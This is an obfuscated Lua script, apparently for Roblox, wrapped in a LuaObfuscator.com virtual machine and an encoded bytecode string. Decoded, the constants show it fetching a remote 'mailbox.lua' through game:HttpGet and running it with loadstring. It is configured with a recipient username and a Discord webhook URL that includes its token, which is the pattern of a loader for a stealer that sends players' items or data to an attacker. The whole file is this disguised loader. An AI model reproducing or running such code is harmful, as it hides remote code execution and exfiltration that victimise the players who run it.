--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/(((6 -1) -(1068 -(68 + 997)))^(v32-(928 -((1484 -(226 + 1044)) + 713)))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((2699 -2079) -((672 -(32 + 85)) + 64)))) ;return v71-(v71%((1606 + 32) -(1523 + 114))) ;else local v72=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v72 + v72))>=v72) and 1) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(957 -(892 + 65))) then v35,v36,v37,v38=v1(v16,v19,v19 + (7 -(9 -5)) );v19=v19 + (6 -(2 + 0)) ;v34=1 -0 ;end if (((1395 -1044) -((1039 -(802 + 150)) + 263))==v34) then return (v38 * (16777396 -(67 + 113))) + (v37 * 65536) + (v36 * (188 + 68)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1265 -(243 + 1022) ;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39==0) then local v74=0 -0 ;while true do if (v74==(0 + 0)) then v40={};v41={};v74=1181 -(1123 + 57) ;end if (v74~=1) then else v42={};v39=1;break;end end end if (v39~=2) then else local v75=0 + 0 ;while true do if (v75~=(255 -(163 + 91))) then else for v100=1931 -(1869 + 61) ,v24() do local v101=0 + 0 ;local v102;local v103;local v104;while true do if ((0 -0)==v101) then v102=0;v103=nil;v101=1 -0 ;end if (v101==(1 + 0)) then v104=nil;while true do if (v102==1) then while true do if (0~=v103) then else v104=v22();if (v21(v104,1 -0 ,1 + 0 )==(1474 -(1329 + 145))) then local v150=0;local v151;local v152;local v153;local v154;local v155;while true do if (v150~=(972 -(140 + 831))) then else v153=nil;v154=nil;v150=1852 -(1409 + 441) ;end if (0==v150) then v151=0;v152=nil;v150=1;end if (v150~=2) then else v155=nil;while true do if (v151~=(719 -(15 + 703))) then else v154=nil;v155=nil;v151=1 + 1 ;end if ((438 -(262 + 176))==v151) then v152=1721 -(345 + 1376) ;v153=nil;v151=689 -(198 + 490) ;end if (v151~=2) then else while true do if (v152~=(4 -3)) then else local v190=0 -0 ;while true do if (v190==1) then v152=1208 -(696 + 510) ;break;end if (v190==0) then local v198=0 -0 ;while true do if (1~=v198) then else v190=1;break;end if (v198==(1262 -(1091 + 171))) then v155={v23(),v23(),nil,nil};if (v153==0) then local v203=0 -0 ;local v204;local v205;local v206;while true do if (v203==0) then v204=0;v205=nil;v203=1;end if (v203==(699 -(208 + 490))) then v206=nil;while true do if (v204~=1) then else while true do if ((0 + 0)==v205) then v206=0;while true do if (v206==(0 + 0)) then v155[839 -(660 + 176) ]=v23();v155[4]=v23();break;end end break;end end break;end if (v204==0) then v205=0 + 0 ;v206=nil;v204=1;end end break;end end elseif (v153==1) then v155[205 -(14 + 188) ]=v24();elseif (v153==(677 -(534 + 141))) then v155[3]=v24() -(2^(7 + 9)) ;elseif (v153==(3 + 0)) then local v210=0;local v211;local v212;local v213;while true do if ((0 + 0)==v210) then v211=0;v212=nil;v210=1;end if (v210==1) then v213=nil;while true do if (v211==(0 -0)) then v212=0 -0 ;v213=nil;v211=1;end if ((2 -1)~=v211) then else while true do if ((0 + 0)==v212) then v213=0;while true do if (v213~=(0 + 0)) then else v155[399 -(115 + 281) ]=v24() -((4 -2)^16) ;v155[4]=v23();break;end end break;end end break;end end break;end end end v198=1 + 0 ;end end end end end if (v152==(0 -0)) then local v191=0;local v192;local v193;while true do if (v191==0) then v192=0;v193=nil;v191=1;end if (v191==(3 -2)) then while true do if (v192==0) then v193=0;while true do if (v193~=0) then else local v207=0;while true do if (v207==(867 -(550 + 317))) then v153=v21(v104,2 -0 ,3 -0 );v154=v21(v104,11 -7 ,291 -(134 + 151) );v207=1666 -(970 + 695) ;end if (v207~=1) then else v193=1;break;end end end if (v193==1) then v152=1 -0 ;break;end end break;end end break;end end end if (v152~=3) then else if (v21(v154,1993 -(582 + 1408) ,10 -7 )~=(1 -0)) then else v155[15 -11 ]=v45[v155[4]];end v40[v100]=v155;break;end if (v152==(1826 -(1195 + 629))) then local v195=0 -0 ;while true do if (v195==(241 -(187 + 54))) then if (v21(v154,1,1)~=(781 -(162 + 618))) then else v155[2 + 0 ]=v45[v155[2]];end if (v21(v154,2,2 + 0 )~=(1 -0)) then else v155[3]=v45[v155[4 -1 ]];end v195=1;end if (v195~=1) then else v152=3;break;end end end end break;end end break;end end end break;end end break;end if (v102~=0) then else v103=0;v104=nil;v102=1 + 0 ;end end break;end end end v39=3;break;end if (0==v75) then for v105=1637 -(1373 + 263) ,v44 do local v106=1000 -(451 + 549) ;local v107;local v108;local v109;while true do if (v106==(0 + 0)) then v107=0;v108=nil;v106=1;end if (v106==(1 -0)) then v109=nil;while true do if ((0 -0)~=v107) then else v108=v22();v109=nil;v107=1385 -(746 + 638) ;end if (v107~=(1 + 0)) then else if (v108==(1 -0)) then v109=v22()~=(341 -(218 + 123)) ;elseif (v108==(1583 -(1535 + 46))) then v109=v25();elseif (v108==3) then v109=v26();end v45[v105]=v109;break;end end break;end end end v43[3 + 0 ]=v22();v75=1 + 0 ;end end end if (v39==3) then local v76=0;while true do if (v76~=(560 -(306 + 254))) then else for v110=1,v24() do v41[v110-(1 + 0) ]=v29();end return v43;end end end if (v39==1) then local v77=0 -0 ;local v78;while true do if (0==v77) then v78=0;while true do if (v78==0) then local v119=0;while true do if (v119~=1) then else v78=1468 -(899 + 568) ;break;end if (v119==(0 + 0)) then v43={v40,v41,nil,v42};v44=v24();v119=1;end end end if (v78==1) then v45={};v39=292 -(60 + 230) ;break;end end break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=572 -(426 + 146) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1 + 1)) then v51=v21(v48,1477 -(282 + 1174) ,842 -(569 + 242) );v52=((v21(v48,92 -60 )==(1 + 0)) and  -((2465 -1440) -(706 + 318))) or (1252 -((2128 -1407) + 530)) ;v46=7 -4 ;end if (v46==((3635 -2364) -(945 + 326))) then v47=v24();v48=v24();v46=2 -1 ;end if ((117 -(4 + 110))==v46) then if (v51==(0 + 0)) then if (v50==0) then return v52 * (700 -(271 + 429)) ;else local v112=0 + 0 ;while true do if (v112==(1500 -(1408 + 92))) then v51=1087 -(461 + 625) ;v49=(1872 -(57 + 527)) -(993 + 295) ;break;end end end elseif (v51==(107 + 1940)) then return ((v50==(1171 -(418 + 753))) and (v52 * ((1 + 0)/0))) or (v52 * NaN) ;end return v8(v52,v51-(106 + 917) ) * (v49 + (v50/((1 + 1)^((1914 -(106 + 1794)) + (141 -(17 + 86)))))) ;end if (v46==(530 -(406 + 123))) then v49=1770 -(554 + 1195 + 20) ;v50=(v21(v48,1 + 0 + 0 ,1342 -(1249 + 73) ) * ((1 + 1)^32)) + v47 ;v46=1147 -(466 + 679) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 -0) );v19=v19 + v53 ;local v55={};for v69=2 -1 , #v54 do v55[v69]=v2(v1(v3(v54,v69,v69)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=(335 -169) -(122 + 44) ;local v57;while true do if (v56==(0 -0)) then v57=v1(v16,v19,v19);v19=v19 + (3 -(67 -(30 + 35))) ;v56=1 + 0 ;end if (v56==(1 + 0)) then return v57;end end end v23=nil;function v23()local v58=0 + 0 ;local v59;local v60;while true do if ((1257 -(1043 + 214))==v58) then v59,v60=v1(v16,v19,v19 + (7 -5) );v19=v19 + (1214 -(323 + 889)) ;v58=2 -1 ;end if (v58==((132 + 449) -(361 + 219))) then return (v60 * (576 -(53 + 267))) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v73=v2(v0(v61,16));if v20 then local v82=v5(v73,v20);v20=nil;return v82;else return v73;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end if (1==v98) then if (v96<=5) then if (v96<=2) then if (v96<=0) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==2) then for v156=v122,v88 do v125=v125 + 1 ;v93[v156]=v123[v125];end break;end if (v121==1) then v88=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==0) then v122=v95[2];v123,v124=v86(v93[v122](v13(v93,v122 + 1 ,v95[3])));v121=1;end end elseif (v96>1) then local v127=0;local v128;while true do if (v127==0) then v128=v95[2];v93[v128]=v93[v128](v13(v93,v128 + 1 ,v88));break;end end else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=3) then v93[v95[2]]();elseif (v96==4) then v64[v95[3]]=v93[v95[2]];else local v132=0;local v133;local v134;local v135;local v136;local v137;while true do if (v132==0) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v132=1;end if (5==v132) then v134,v135=v86(v93[v137](v13(v93,v137 + 1 ,v95[3])));v88=(v135 + v137) -1 ;v133=0;for v187=v137,v88 do v133=v133 + 1 ;v93[v187]=v134[v133];end v132=6;end if (v132==3) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v132=4;end if (v132==1) then v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v95=v83[v87];v137=v95[2];v132=2;end if (6==v132) then v87=v87 + 1 ;v95=v83[v87];v137=v95[2];v93[v137]=v93[v137](v13(v93,v137 + 1 ,v88));v132=7;end if (7==v132) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v132=8;end if (8==v132) then v95=v83[v87];v87=v95[3];break;end if (v132==2) then v136=v93[v95[3]];v93[v137 + 1 ]=v136;v93[v137]=v136[v95[4]];v87=v87 + 1 ;v132=3;end if (v132==4) then v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v95=v83[v87];v137=v95[2];v132=5;end end end elseif (v96<=8) then if (v96<=6) then v87=v95[3];elseif (v96==7) then do return;end elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=10) then if (v96>9) then v64[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v64[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v87=v95[3];else local v142=0;local v143;local v144;while true do if (v142==0) then v143=v95[2];v144=v93[v95[3]];v142=1;end if (v142==1) then v93[v143 + 1 ]=v144;v93[v143]=v144[v95[4]];break;end end end elseif (v96==11) then v93[v95[2]]=v95[3];else v93[v95[2]]=v64[v95[3]];end v87=v87 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030B3O006861686168613O39333203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135323638322O30383137312O30383039302F51665164415556755671346A4F3754596A4D506C674364704E7A363254754D53594148534945726B6C7069623465466E524F50726667457A42314A7A55633454334B445A001D3O00120B3O00013O0026083O000C000100020004063O000C000100120C000100033O001205000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001C00010026083O0001000100010004063O0001000100120B000100013O00260800010013000100020004063O0013000100120B3O00023O0004063O000100010026080001000F000100010004063O000F000100120B000200083O00120A000200073O00122O0002000A3O00122O000200093O00122O000100023O00044O000F00010004063O000100012O00073O00017O00",v9(),...);
